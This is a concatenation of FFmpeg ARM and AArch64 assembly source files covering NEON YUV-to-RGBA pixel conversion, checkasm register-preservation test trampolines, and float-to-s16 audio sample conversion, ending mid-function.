vmull.s16 q1, d14, d0 @ q1 = (srcY - y_offset) * y_coeff (left)
vmull.s16 q2, d15, d0 @ q2 = (srcY - y_offset) * y_coeff (right)
.ifc \ofmt,argb
compute_rgba_32 d13, d14, d15, d12
.endif
.ifc \ofmt,rgba
compute_rgba_32 d12, d13, d14, d15
.endif
.ifc \ofmt,abgr
compute_rgba_32 d15, d14, d13, d12
.endif
.ifc \ofmt,bgra
compute_rgba_32 d14, d13, d12, d15
.endif
vst4.8 {q6, q7}, [\dst,:128]!
.endm
@ One luma line, 16 px, 16-bit precision (4:2:2 path: chroma per line).
.macro process_1l_16px_16 ofmt
compute_premult_16 d28, d29, d30, d31
vld1.8 {q7}, [r4]!
compute_16px_16 r2, d14, d15, \ofmt
.endm
@ One luma line, 16 px, 32-bit precision: done as two 8-px halves, with
@ the right half of the luma stashed in d28 while q7 is reused.
.macro process_1l_16px_32 ofmt
compute_premult_32 d28, d30
vld1.8 {q7}, [r4]!
vmov d28, d15 @ save right of the line of luma for later use
compute_8px_32 r2, d14, \ofmt
compute_premult_32 d29, d31
compute_8px_32 r2, d28, \ofmt
.endm
@ Two luma lines sharing one chroma line (4:2:0 path), 16-bit precision.
.macro process_2l_16px_16 ofmt
compute_premult_16 d28, d29, d30, d31
vld1.8 {q7}, [r4]! @ first line of luma
compute_16px_16 r2, d14, d15, \ofmt
vld1.8 {q7}, [r12]! @ second line of luma
compute_16px_16 r11, d14, d15, \ofmt
.endm
@ Two luma lines, 32-bit precision, processed as 8-px halves.
.macro process_2l_16px_32 ofmt
compute_premult_32 d28, d30
vld1.8 {q7}, [r4]! @ first line of luma
vmov d28, d15 @ save right of the first line of luma for later use
compute_8px_32 r2, d14, \ofmt
vld1.8 {q7}, [r12]! @ second line of luma
vmov d30, d15 @ save right of the second line of luma for later use
compute_8px_32 r11, d14, \ofmt
compute_premult_32 d29, d31
compute_8px_32 r2, d28, \ofmt
compute_8px_32 r11, d30, \ofmt
.endm
@ Argument loading for the semi-planar (NV12/NV21) entry points.
@ Incoming: r0 = width, r1 = height, r2 = dst, r3 = dst linesize;
@ the rest of the C arguments are on the stack above the 10 core
@ registers and 4 q registers pushed here (offset #104 onward).
.macro load_args_nvx
push {r4-r12, lr}
vpush {q4-q7}
ldr r4, [sp, #104] @ r4 = srcY
ldr r5, [sp, #108] @ r5 = linesizeY
ldr r6, [sp, #112] @ r6 = srcC
ldr r7, [sp, #116] @ r7 = linesizeC
ldr r8, [sp, #120] @ r8 = table
ldr r9, [sp, #124] @ r9 = y_offset
ldr r10,[sp, #128] @ r10 = y_coeff
vdup.16 d0, r10 @ d0 = y_coeff
vld1.16 {d1}, [r8] @ d1 = *table
add r11, r2, r3 @ r11 = dst + linesize (dst2)
add r12, r4, r5 @ r12 = srcY + linesizeY (srcY2)
lsl r3, r3, #1
lsl r5, r5, #1
lsl r8, r0, #2
sub r3, r3, r8 @ r3 = linesize * 2 - width * 4 (padding)
sub r5, r5, r0 @ r5 = linesizeY * 2 - width (paddingY)
sub r7, r7, r0 @ r7 = linesizeC - width (paddingC)
.endm
@ Argument loading for the planar 4:2:0 entry points (separate U/V
@ planes; their linesizes are reloaded per row inside the main loop).
.macro load_args_yuv420p
push {r4-r12, lr}
vpush {q4-q7}
ldr r4, [sp, #104] @ r4 = srcY
ldr r5, [sp, #108] @ r5 = linesizeY
ldr r6, [sp, #112] @ r6 = srcU
ldr r8, [sp, #128] @ r8 = table
ldr r9, [sp, #132] @ r9 = y_offset
ldr r10,[sp, #136] @ r10 = y_coeff
vdup.16 d0, r10 @ d0 = y_coeff
vld1.16 {d1}, [r8] @ d1 = *table
add r11, r2, r3 @ r11 = dst + linesize (dst2)
add r12, r4, r5 @ r12 = srcY + linesizeY (srcY2)
lsl r3, r3, #1
lsl r5, r5, #1
lsl r8, r0, #2
sub r3, r3, r8 @ r3 = linesize * 2 - width * 4 (padding)
sub r5, r5, r0 @ r5 = linesizeY * 2 - width (paddingY)
ldr r10,[sp, #120] @ r10 = srcV
.endm
@ Argument loading for the planar 4:2:2 entry points (one luma line per
@ chroma line; note r3/r5 are NOT doubled here, comments keep the *2
@ naming of the sibling macros).
.macro load_args_yuv422p
push {r4-r12, lr}
vpush {q4-q7}
ldr r4, [sp, #104] @ r4 = srcY
ldr r5, [sp, #108] @ r5 = linesizeY
ldr r6, [sp, #112] @ r6 = srcU
ldr r7, [sp, #116] @ r7 = linesizeU
ldr r12,[sp, #124] @ r12 = linesizeV
ldr r8, [sp, #128] @ r8 = table
ldr r9, [sp, #132] @ r9 = y_offset
ldr r10,[sp, #136] @ r10 = y_coeff
vdup.16 d0, r10 @ d0 = y_coeff
vld1.16 {d1}, [r8] @ d1 = *table
add r11, r2, r3 @ r11 = dst + linesize (dst2)
lsl r8, r0, #2
sub r3, r3, r8 @ r3 = linesize * 2 - width * 4 (padding)
sub r5, r5, r0 @ r5 = linesizeY * 2 - width (paddingY)
sub r7, r7, r0, lsr #1 @ r7 = linesizeU - width / 2 (paddingU)
sub r12,r12,r0, lsr #1 @ r12 = linesizeV - width / 2 (paddingV)
ldr r10,[sp, #120] @ r10 = srcV
.endm
@ Emit one exported conversion function ff_<ifmt>_to_<ofmt>_neon_<precision>.
@ Outer loop (1:) = one row pair (or single row for 4:2:2); inner loop (2:)
@ = 16 pixels.  Width is assumed to be handled in multiples of 16 here.
.macro declare_func ifmt ofmt precision
function ff_\ifmt\()_to_\ofmt\()_neon_\precision\(), export=1
.ifc \ifmt,nv12
load_args_nvx
.endif
.ifc \ifmt,nv21
load_args_nvx
.endif
.ifc \ifmt,yuv420p
load_args_yuv420p
.endif
.ifc \ifmt,yuv422p
load_args_yuv422p
.endif
1:
mov r8, r0 @ r8 = width
2:
pld [r6, #64*3]
pld [r4, #64*3]
vmov.i8 d10, #128
.ifc \ifmt,nv12
pld [r12, #64*3]
vld2.8 {d2, d3}, [r6]! @ q1: interleaved chroma line
vsubl.u8 q14, d2, d10 @ q14 = U - 128
vsubl.u8 q15, d3, d10 @ q15 = V - 128
process_2l_16px_\precision \ofmt
.endif
.ifc \ifmt,nv21
pld [r12, #64*3]
vld2.8 {d2, d3}, [r6]! @ q1: interleaved chroma line
@ NV21 swaps the interleaved pair relative to NV12
vsubl.u8 q14, d3, d10 @ q14 = U - 128
vsubl.u8 q15, d2, d10 @ q15 = V - 128
process_2l_16px_\precision \ofmt
.endif
.ifc \ifmt,yuv420p
pld [r10, #64*3]
pld [r12, #64*3]
vld1.8 d2, [r6]! @ d2: chroma red line
vld1.8 d3, [r10]! @ d3: chroma blue line
vsubl.u8 q14, d2, d10 @ q14 = U - 128
vsubl.u8 q15, d3, d10 @ q15 = V - 128
process_2l_16px_\precision \ofmt
.endif
.ifc \ifmt,yuv422p
pld [r10, #64*3]
vld1.8 d2, [r6]! @ d2: chroma red line
vld1.8 d3, [r10]! @ d3: chroma blue line
vsubl.u8 q14, d2, d10 @ q14 = U - 128
vsubl.u8 q15, d3, d10 @ q15 = V - 128
process_1l_16px_\precision \ofmt
.endif
subs r8, r8, #16 @ width -= 16
bgt 2b
@ end of row: advance all pointers past their padding
add r2, r2, r3 @ dst += padding
add r4, r4, r5 @ srcY += paddingY
.ifc \ifmt,nv12
add r11, r11, r3 @ dst2 += padding
add r12, r12, r5 @ srcY2 += paddingY
add r6, r6, r7 @ srcC += paddingC
subs r1, r1, #2 @ height -= 2
.endif
.ifc \ifmt,nv21
add r11, r11, r3 @ dst2 += padding
add r12, r12, r5 @ srcY2 += paddingY
add r6, r6, r7 @ srcC += paddingC
subs r1, r1, #2 @ height -= 2
.endif
.ifc \ifmt,yuv420p
add r11, r11, r3 @ dst2 += padding
add r12, r12, r5 @ srcY2 += paddingY
@ chroma paddings recomputed here because r7/r12 are reused as scratch
ldr r7, [sp, #116] @ r7 = linesizeU
sub r7, r7, r0, lsr #1 @ r7 = linesizeU - width / 2 (paddingU)
add r6, r6, r7 @ srcU += paddingU
ldr r7, [sp, #124] @ r7 = linesizeV
sub r7, r7, r0, lsr #1 @ r7 = linesizeV - width / 2 (paddingV)
add r10, r10, r7 @ srcV += paddingV
subs r1, r1, #2 @ height -= 2
.endif
.ifc \ifmt,yuv422p
add r6, r6, r7 @ srcU += paddingU
add r10,r10,r12 @ srcV += paddingV
subs r1, r1, #1 @ height -= 1
.endif
bgt 1b
vpop {q4-q7}
pop {r4-r12, lr}
mov pc, lr
endfunc
.endm
@ Emit the four RGBA channel orderings for one input format / precision.
.macro declare_rgb_funcs ifmt precision
declare_func \ifmt, argb, \precision
declare_func \ifmt, rgba, \precision
declare_func \ifmt, abgr, \precision
declare_func \ifmt, bgra, \precision
.endm
@ Instantiate all supported input formats at both precisions.
declare_rgb_funcs nv12, 16
declare_rgb_funcs nv21, 16
declare_rgb_funcs nv12, 32
declare_rgb_funcs nv21, 32
declare_rgb_funcs yuv420p, 16
declare_rgb_funcs yuv420p, 32
declare_rgb_funcs yuv422p, 16
declare_rgb_funcs yuv422p, 32
|
Akagi201/ffmpeg-xcode
| 4,380
|
ffmpeg-3.0.2/tests/checkasm/aarch64/checkasm.S
|
/****************************************************************************
* Assembly testing and benchmarking tool
* Copyright (c) 2015 Martin Storsjo
* Copyright (c) 2015 Janne Grunau
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02111, USA.
*****************************************************************************/
#include "libavutil/aarch64/asm.S"
// Pseudo-random seed values copied into the callee-saved registers before
// the call under test; any register the callee fails to preserve will no
// longer match this table afterwards.
const register_init
.quad 0x21f86d66c8ca00ce
.quad 0x75b6ba21077c48ad
.quad 0xed56bb2dcb3c7736
.quad 0x8bda43d3fd1a7e06
.quad 0xb64a9c9e5d318408
.quad 0xdf9a54b303f1d3a3
.quad 0x4a75479abd64e097
.quad 0x249214109d5d1c88
.quad 0x1a1b2550a612b48c
.quad 0x79445c159ce79064
.quad 0x2eed899d5a28ddcd
.quad 0x86b2536fcd8cf636
.quad 0xb0856806085e7943
.quad 0x3f2bf84fc0fcca4e
.quad 0xacbd382dcf5b8de2
.quad 0xd229e1f5b281303f
.quad 0x71aeaff20b095fd9
.quad 0xab63e2e11fa38ed9
endconst
const error_message
.asciz "failed to preserve register"
endconst
// max number of args used by any asm function.
#define MAX_ARGS 15
// stack bytes for args 8..MAX_ARGS, rounded up to keep sp 16-byte aligned
#define ARG_STACK ((8*(MAX_ARGS - 7) + 15) & ~15)
// checkasm_checked_call(func, ...): trampoline that calls x0 with the
// remaining arguments shifted down one slot, after seeding every AAPCS64
// callee-saved register (x19-x28, d8-d15) from register_init.  On return
// it XOR-compares them against the table and reports any clobber via
// checkasm_fail_func.  The function's {x0,x1} return value is preserved.
function checkasm_checked_call, export=1
stp x29, x30, [sp, #-16]!
mov x29, sp
stp x19, x20, [sp, #-16]!
stp x21, x22, [sp, #-16]!
stp x23, x24, [sp, #-16]!
stp x25, x26, [sp, #-16]!
stp x27, x28, [sp, #-16]!
stp d8, d9, [sp, #-16]!
stp d10, d11, [sp, #-16]!
stp d12, d13, [sp, #-16]!
stp d14, d15, [sp, #-16]!
// seed all callee-saved registers with known garbage
movrel x9, register_init
ldp d8, d9, [x9], #16
ldp d10, d11, [x9], #16
ldp d12, d13, [x9], #16
ldp d14, d15, [x9], #16
ldp x19, x20, [x9], #16
ldp x21, x22, [x9], #16
ldp x23, x24, [x9], #16
ldp x25, x26, [x9], #16
ldp x27, x28, [x9], #16
sub sp, sp, #ARG_STACK
.equ pos, 0
// the first stacked arg is copied to x7
.rept MAX_ARGS-7
ldr x9, [x29, #16 + 8 + pos]
str x9, [sp, #pos]
.equ pos, pos + 8
.endr
// shift args down: the function under test (x0) takes our x1..x7 + stack
mov x12, x0
mov x0, x1
mov x1, x2
mov x2, x3
mov x3, x4
mov x4, x5
mov x5, x6
mov x6, x7
ldr x7, [x29, #16]
blr x12
add sp, sp, #ARG_STACK
stp x0, x1, [sp, #-16]!            // save the callee's return value
movrel x9, register_init
movi v3.8h, #0
// accumulate (reg XOR expected) into v3; nonzero lane => clobbered
.macro check_reg_neon reg1, reg2
ldr q0, [x9], #16
uzp1 v1.2d, v\reg1\().2d, v\reg2\().2d
eor v0.16b, v0.16b, v1.16b
orr v3.16b, v3.16b, v0.16b
.endm
check_reg_neon 8, 9
check_reg_neon 10, 11
check_reg_neon 12, 13
check_reg_neon 14, 15
uqxtn v3.8b, v3.8h
umov x3, v3.d[0]
// same check for the general-purpose callee-saved registers, into x3
.macro check_reg reg1, reg2
ldp x0, x1, [x9], #16
eor x0, x0, \reg1
eor x1, x1, \reg2
orr x3, x3, x0
orr x3, x3, x1
.endm
check_reg x19, x20
check_reg x21, x22
check_reg x23, x24
check_reg x25, x26
check_reg x27, x28
cbz x3, 0f
movrel x0, error_message
bl X(checkasm_fail_func)
0:
ldp x0, x1, [sp], #16              // restore the callee's return value
ldp d14, d15, [sp], #16
ldp d12, d13, [sp], #16
ldp d10, d11, [sp], #16
ldp d8, d9, [sp], #16
ldp x27, x28, [sp], #16
ldp x25, x26, [sp], #16
ldp x23, x24, [sp], #16
ldp x21, x22, [sp], #16
ldp x19, x20, [sp], #16
ldp x29, x30, [sp], #16
ret
endfunc
|
Akagi201/ffmpeg-xcode
| 3,609
|
ffmpeg-3.0.2/tests/checkasm/arm/checkasm.S
|
/****************************************************************************
* Assembly testing and benchmarking tool
* Copyright (c) 2015 Martin Storsjo
* Copyright (c) 2015 Janne Grunau
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02111, USA.
*****************************************************************************/
#include "libavutil/arm/asm.S"
@ Pseudo-random seed values for the callee-saved registers; a register the
@ tested function fails to preserve will not match this table afterwards.
const register_init
.quad 0x21f86d66c8ca00ce
.quad 0x75b6ba21077c48ad
.quad 0xed56bb2dcb3c7736
.quad 0x8bda43d3fd1a7e06
.quad 0xb64a9c9e5d318408
.quad 0xdf9a54b303f1d3a3
.quad 0x4a75479abd64e097
.quad 0x249214109d5d1c88
endconst
const error_message
.asciz "failed to preserve register"
endconst
@ max number of args used by any asm function.
#define MAX_ARGS 15
@ stack bytes for the args that do not fit in r0-r3 (first 2 slots reused)
#define ARG_STACK 4*(MAX_ARGS - 2)
@ Emit checkasm_checked_call_<variant> (variant = vfp or novfp): call the
@ function in r0 with the remaining args shifted down, after seeding the
@ AAPCS callee-saved registers (r4-r11 and, for vfp, d8-d15 + FPSCR) from
@ register_init; afterwards XOR-compare them and report clobbers via
@ checkasm_fail_func.  The callee's {r0,r1} return value is preserved.
@ "pushed" tracks the prologue size so stacked args can be located.
.macro clobbercheck variant
.equ pushed, 4*9
function checkasm_checked_call_\variant, export=1
push {r4-r11, lr}
.ifc \variant, vfp
vpush {d8-d15}
fmrx r4, FPSCR
push {r4}
.equ pushed, pushed + 16*4 + 4
.endif
movrel r12, register_init
.ifc \variant, vfp
vldm r12, {d8-d15}
.endif
ldm r12, {r4-r11}
sub sp, sp, #ARG_STACK
.equ pos, 0
@ copy stacked arguments down for the callee
.rept MAX_ARGS-2
ldr r12, [sp, #ARG_STACK + pushed + 8 + pos]
str r12, [sp, #pos]
.equ pos, pos + 4
.endr
@ shift args down: callee gets our r2, r3 and the first two stack slots
mov r12, r0
mov r0, r2
mov r1, r3
ldrd r2, r3, [sp, #ARG_STACK + pushed]
blx r12
add sp, sp, #ARG_STACK
push {r0, r1}                      @ save the callee's return value
movrel r12, register_init
mov r3, #0
.ifc \variant, vfp
@ accumulate (dreg XOR expected) into r3; the final load rewinds r12
@ (-56) so the subsequent core-register checks reread the table start
.macro check_reg_vfp, dreg, inc=8
ldrd r0, r1, [r12], #\inc
vmov r2, lr, \dreg
eor r0, r0, r2
eor r1, r1, lr
orr r3, r3, r0
orr r3, r3, r1
.endm
.irp n, 8, 9, 10, 11, 12, 13, 14
check_reg_vfp d\n
.endr
check_reg_vfp d15, -56
.purgem check_reg_vfp
fmrx r0, FPSCR
ldr r1, [sp, #8]
eor r0, r0, r1
@ Ignore changes in the topmost 5 bits
lsl r0, r0, #5
orr r3, r3, r0
.endif
@ same XOR-compare for the core callee-saved registers
.macro check_reg reg1, reg2=
ldrd r0, r1, [r12], #8
eor r0, r0, \reg1
orrs r3, r3, r0
.ifnb \reg2
eor r1, r1, \reg2
orrs r3, r3, r1
.endif
.endm
check_reg r4, r5
check_reg r6, r7
@ r9 is a volatile register in the ios ABI
#ifdef __APPLE__
check_reg r8
#else
check_reg r8, r9
#endif
check_reg r10, r11
.purgem check_reg
beq 0f
movrel r0, error_message
blx X(checkasm_fail_func)
0:
pop {r0, r1}                       @ restore the callee's return value
.ifc \variant, vfp
pop {r2}
fmxr FPSCR, r2
vpop {d8-d15}
.endif
pop {r4-r11, pc}
endfunc
.endm
#if HAVE_VFP || HAVE_NEON
clobbercheck vfp
#endif
clobbercheck novfp
|
Akagi201/ffmpeg-xcode
| 14,828
|
ffmpeg-3.0.2/libswresample/aarch64/audio_convert_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
* Copyright (c) 2014 Janne Grunau <janne-libav@jannau.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "libavutil/aarch64/asm.S"
// void conv_flt_to_s16(int16_t *dst /* x0 */, const float *src /* x1 */,
//                      int len /* x2 */)
// Convert floats to s16: fcvtzs #31 scales to Q31 fixed point, then
// sqrshrn takes the top 16 bits with rounding and saturation.
// Main loop (1:) handles 16 samples per iteration; len is assumed to be
// a multiple of 8 (initial subs #8, tails of 8 or 16 at labels 3:/2:).
function swri_oldapi_conv_flt_to_s16_neon, export=1
subs x2, x2, #8
ld1 {v0.4s}, [x1], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x1], #16
fcvtzs v5.4s, v1.4s, #31
b.eq 3f                            // exactly 8 samples total
ands x12, x2, #~15
b.eq 2f                            // fewer than 16 remain: finish 16-tail
1: subs x12, x12, #16
sqrshrn v4.4h, v4.4s, #16
ld1 {v2.4s}, [x1], #16
fcvtzs v6.4s, v2.4s, #31
sqrshrn2 v4.8h, v5.4s, #16
ld1 {v3.4s}, [x1], #16
fcvtzs v7.4s, v3.4s, #31
sqrshrn v6.4h, v6.4s, #16
st1 {v4.8h}, [x0], #16
sqrshrn2 v6.8h, v7.4s, #16
ld1 {v0.4s}, [x1], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x1], #16
fcvtzs v5.4s, v1.4s, #31
st1 {v6.8h}, [x0], #16
b.ne 1b
ands x2, x2, #15
b.eq 3f
2: ld1 {v2.4s}, [x1], #16          // final 16 samples (8 already converted)
sqrshrn v4.4h, v4.4s, #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x1], #16
sqrshrn2 v4.8h, v5.4s, #16
fcvtzs v7.4s, v3.4s, #31
sqrshrn v6.4h, v6.4s, #16
st1 {v4.8h}, [x0], #16
sqrshrn2 v6.8h, v7.4s, #16
st1 {v6.8h}, [x0]
ret
3: sqrshrn v4.4h, v4.4s, #16       // final 8 samples
sqrshrn2 v4.8h, v5.4s, #16
st1 {v4.8h}, [x0]
ret
endfunc
// void conv_fltp_to_s16_2ch(int16_t *dst /* x0 */, float *const *src /* x1 */,
//                           int len /* x2 */, ...)
// Convert two planar float channels (pointers at x1[0]/x1[1]) into one
// interleaved s16 stream.  Each float is converted to Q31 (fcvtzs #31);
// "sri ch1, ch0, #16" then shifts ch0 down to its top 16 bits and inserts
// it below ch1's top 16 bits, so every 32-bit lane holds an interleaved
// {ch0, ch1} s16 pair ready to store (truncating, not rounded).
// len is assumed to be a multiple of 8; main loop does 16 frames.
function swri_oldapi_conv_fltp_to_s16_2ch_neon, export=1
ldp x4, x5, [x1]                   // x4 = channel 0, x5 = channel 1
subs x2, x2, #8
ld1 {v0.4s}, [x4], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v5.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x5], #16
fcvtzs v7.4s, v3.4s, #31
b.eq 3f                            // exactly 8 frames total
ands x12, x2, #~15
b.eq 2f                            // fewer than 16 remain: 16-frame tail
1: subs x12, x12, #16
ld1 {v16.4s}, [x4], #16
fcvtzs v20.4s, v16.4s, #31
sri v6.4s, v4.4s, #16
ld1 {v17.4s}, [x4], #16
fcvtzs v21.4s, v17.4s, #31
ld1 {v18.4s}, [x5], #16
fcvtzs v22.4s, v18.4s, #31
ld1 {v19.4s}, [x5], #16
sri v7.4s, v5.4s, #16
st1 {v6.4s}, [x0], #16
fcvtzs v23.4s, v19.4s, #31
st1 {v7.4s}, [x0], #16
sri v22.4s, v20.4s, #16
ld1 {v0.4s}, [x4], #16
sri v23.4s, v21.4s, #16
st1 {v22.4s}, [x0], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v5.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x5], #16
fcvtzs v7.4s, v3.4s, #31
st1 {v23.4s}, [x0], #16
b.ne 1b
ands x2, x2, #15
b.eq 3f
2: sri v6.4s, v4.4s, #16           // final 16 frames (8 already converted)
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v2.4s, v2.4s, #31
sri v7.4s, v5.4s, #16
ld1 {v3.4s}, [x5], #16
fcvtzs v3.4s, v3.4s, #31
sri v2.4s, v0.4s, #16
st1 {v6.4s,v7.4s}, [x0], #32
sri v3.4s, v1.4s, #16
st1 {v2.4s,v3.4s}, [x0], #32
ret
3: sri v6.4s, v4.4s, #16           // final 8 frames
sri v7.4s, v5.4s, #16
st1 {v6.4s,v7.4s}, [x0]
ret
endfunc
// Convert N planar float channels to interleaved s16.
//   x0 = int16_t *dst, x1 = float *const *src, w2 = samples/channel,
//   w3 = channel count
// 1- and 2-channel cases tail-call the dedicated routines.  Otherwise
// channels are consumed in groups of 4, then 2, then 1; x12 = 2*channels
// is the byte stride between consecutive frames, so lane stores with
// stride x12 scatter each group into its interleaved slots.
function swri_oldapi_conv_fltp_to_s16_nch_neon, export=1
cmp w3, #2
b.eq X(swri_oldapi_conv_fltp_to_s16_2ch_neon)   // 2 channels: dedicated routine
b.gt 1f
ldr x1, [x1]                            // 1 channel: unwrap pointer array
b X(swri_oldapi_conv_flt_to_s16_neon)
1:
cmp w3, #4
lsl x12, x3, #1                         // x12 = output frame stride in bytes (2*channels)
b.lt 4f
5: // 4 channels
ldp x4, x5, [x1], #16                   // x4..x7 = next four channel planes
ldp x6, x7, [x1], #16
mov w9, w2                              // w9 = samples remaining for this group
mov x8, x0                              // x8 = write cursor for this group's slot
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
ld1 {v6.4s}, [x6], #16
fcvtzs v6.4s, v6.4s, #31
ld1 {v7.4s}, [x7], #16
fcvtzs v7.4s, v7.4s, #31
6:
subs w9, w9, #8                         // loop: 8 frames of this 4-channel group
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
sri v5.4s, v4.4s, #16                   // pack ch0/ch1 into s16 pairs
ld1 {v1.4s}, [x5], #16
fcvtzs v1.4s, v1.4s, #31
sri v7.4s, v6.4s, #16                   // pack ch2/ch3
ld1 {v2.4s}, [x6], #16
fcvtzs v2.4s, v2.4s, #31
zip1 v16.4s, v5.4s, v7.4s               // interleave pairs -> 4-channel frames
ld1 {v3.4s}, [x7], #16
fcvtzs v3.4s, v3.4s, #31
zip2 v17.4s, v5.4s, v7.4s
st1 {v16.d}[0], [x8], x12               // one 4ch s16 frame per strided store
sri v1.4s, v0.4s, #16
st1 {v16.d}[1], [x8], x12
sri v3.4s, v2.4s, #16
st1 {v17.d}[0], [x8], x12
zip1 v18.4s, v1.4s, v3.4s
st1 {v17.d}[1], [x8], x12
zip2 v19.4s, v1.4s, v3.4s
b.eq 7f
ld1 {v4.4s}, [x4], #16                  // preload the next 8 frames
fcvtzs v4.4s, v4.4s, #31
st1 {v18.d}[0], [x8], x12
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
st1 {v18.d}[1], [x8], x12
ld1 {v6.4s}, [x6], #16
fcvtzs v6.4s, v6.4s, #31
st1 {v19.d}[0], [x8], x12
ld1 {v7.4s}, [x7], #16
fcvtzs v7.4s, v7.4s, #31
st1 {v19.d}[1], [x8], x12
b 6b
7:                                      // flush last 4 frames of the group
st1 {v18.d}[0], [x8], x12
st1 {v18.d}[1], [x8], x12
st1 {v19.d}[0], [x8], x12
st1 {v19.d}[1], [x8], x12
subs w3, w3, #4
b.eq end
cmp w3, #4
add x0, x0, #8                          // advance dst past the 4 channels just done
b.ge 5b
4: // 2 channels
cmp w3, #2
b.lt 4f
ldp x4, x5, [x1], #16
mov w9, w2
mov x8, x0
tst w9, #8                              // odd block of 8 to peel first?
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
ld1 {v6.4s}, [x4], #16
fcvtzs v6.4s, v6.4s, #31
ld1 {v7.4s}, [x5], #16
fcvtzs v7.4s, v7.4s, #31
b.eq 6f
subs w9, w9, #8
b.eq 7f
sri v5.4s, v4.4s, #16                   // peel 8 frames, refilling as we store
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
st1 {v5.s}[0], [x8], x12
sri v7.4s, v6.4s, #16
st1 {v5.s}[1], [x8], x12
ld1 {v6.4s}, [x4], #16
fcvtzs v6.4s, v6.4s, #31
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
st1 {v7.s}[0], [x8], x12
st1 {v7.s}[1], [x8], x12
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
st1 {v7.s}[2], [x8], x12
st1 {v7.s}[3], [x8], x12
ld1 {v7.4s}, [x5], #16
fcvtzs v7.4s, v7.4s, #31
6:
subs w9, w9, #16                        // main loop: 16 frames/iteration
ld1 {v0.4s}, [x4], #16
sri v5.4s, v4.4s, #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x5], #16
sri v7.4s, v6.4s, #16
st1 {v5.s}[0], [x8], x12                // one stereo s16 frame per 32-bit lane
st1 {v5.s}[1], [x8], x12
fcvtzs v1.4s, v1.4s, #31
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
ld1 {v2.4s}, [x4], #16
st1 {v7.s}[0], [x8], x12
fcvtzs v2.4s, v2.4s, #31
st1 {v7.s}[1], [x8], x12
ld1 {v3.4s}, [x5], #16
st1 {v7.s}[2], [x8], x12
fcvtzs v3.4s, v3.4s, #31
st1 {v7.s}[3], [x8], x12
sri v1.4s, v0.4s, #16
sri v3.4s, v2.4s, #16
b.eq 6f
ld1 {v4.4s}, [x4], #16                  // refill while draining v1/v3
st1 {v1.s}[0], [x8], x12
fcvtzs v4.4s, v4.4s, #31
st1 {v1.s}[1], [x8], x12
ld1 {v5.4s}, [x5], #16
st1 {v1.s}[2], [x8], x12
fcvtzs v5.4s, v5.4s, #31
st1 {v1.s}[3], [x8], x12
ld1 {v6.4s}, [x4], #16
st1 {v3.s}[0], [x8], x12
fcvtzs v6.4s, v6.4s, #31
st1 {v3.s}[1], [x8], x12
ld1 {v7.4s}, [x5], #16
st1 {v3.s}[2], [x8], x12
fcvtzs v7.4s, v7.4s, #31
st1 {v3.s}[3], [x8], x12
b.gt 6b
6:                                      // flush final 8 frames (v1/v3)
st1 {v1.s}[0], [x8], x12
st1 {v1.s}[1], [x8], x12
st1 {v1.s}[2], [x8], x12
st1 {v1.s}[3], [x8], x12
st1 {v3.s}[0], [x8], x12
st1 {v3.s}[1], [x8], x12
st1 {v3.s}[2], [x8], x12
st1 {v3.s}[3], [x8], x12
b 8f
7:                                      // exactly 8 frames total
sri v5.4s, v4.4s, #16
sri v7.4s, v6.4s, #16
st1 {v5.s}[0], [x8], x12
st1 {v5.s}[1], [x8], x12
